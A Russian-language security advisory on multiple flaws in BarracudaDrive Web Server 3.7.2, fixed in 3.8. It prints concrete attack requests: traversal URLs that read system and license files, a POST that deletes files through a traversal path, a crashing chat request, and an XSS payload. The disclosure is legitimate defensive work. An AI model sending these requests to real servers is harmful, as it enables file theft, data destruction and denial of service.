Множественные уязвимости в BarracudaDrive Web Server

Дата публикации:
11.12.2007
Дата изменения:
27.01.2008
Всего просмотров:
1307
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2007-6314
CVE-2007-6315
CVE-2007-6316
CVE-2007-6317
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Отказ в обслуживании
Раскрытие важных данных
Раскрытие системных данных
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
BarracudaDrive Web Server 3.x
Уязвимые версии: BarracudaDrive Web Server 3.7.2, возможно более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, получить доступ к важным данным и вызвать отказ в обслуживании.

1. Уязвимость существует из-за ошибки проверки входных данных. Удаленный пользователь может с помощью специально сформированного HTTP запроса, содержащего символы обход каталога, просмотреть содержимое произвольных файлов на системе Пример:.

http://SERVER/\..\..\..\boot.ini
http://SERVER/%80..\..\..\boot.ini
http://SERVER/%ff..\bdlicense.dat

2. Уязвимость существует из-за ошибки, которая позволяет злоумышленнику просмотреть исходный код некоторых сценариев на сервере (например, LUA сценарии с расширением .lsp). Злоумышленник может добавить к имени файла символ "+", или "." или любой другой символы выше "0x7f" и просмотреть исходный код сценария. Пример:

http://SERVER/lua.lsp+
http://SERVER/lua.lsp.
http://SERVER/lua.lsp%80

3. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного HTTP POST запроса, содержащего символы обхода каталога, удалить произвольные файлы и пустые директории на системе. Для успешной эксплуатации уязвимости требуется валидная учетная запись. Пример:

POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
Host: SERVER
Cookie: "use the real user's cookie!"
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
dir=..\..\..\file.txt

4. Разыменование нулевого указателя обнаружено в функционале Group Chat. Удаленный пользователь может с помощью специально сформированного запроса, содержащего пустое значение Connection ID, вызвать отказ в обслуживании приложения. Для успешной эксплуатации уязвимости требуется валидная учетная запись. Пример:

POST /eh/chat.ehintf/C. HTTP/1.1
Host: SERVER
Content-Type: text/plain
Content-Length: 0
Cookie: "use the real user's cookie!"

5. Уязвимость существует из-за недостаточной обработки HTTP запросов перед отображением их на странице Trace в административном интерфейсе. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

GET <script>alert('hello');</script> HTTP/1.0

URL производителя: barracudaserver.com/products/BarracudaDrive/WebServer.lsp

Решение: Установите последнюю версию 3.8 с сайта производителя.

или введите имя

CAPTCHA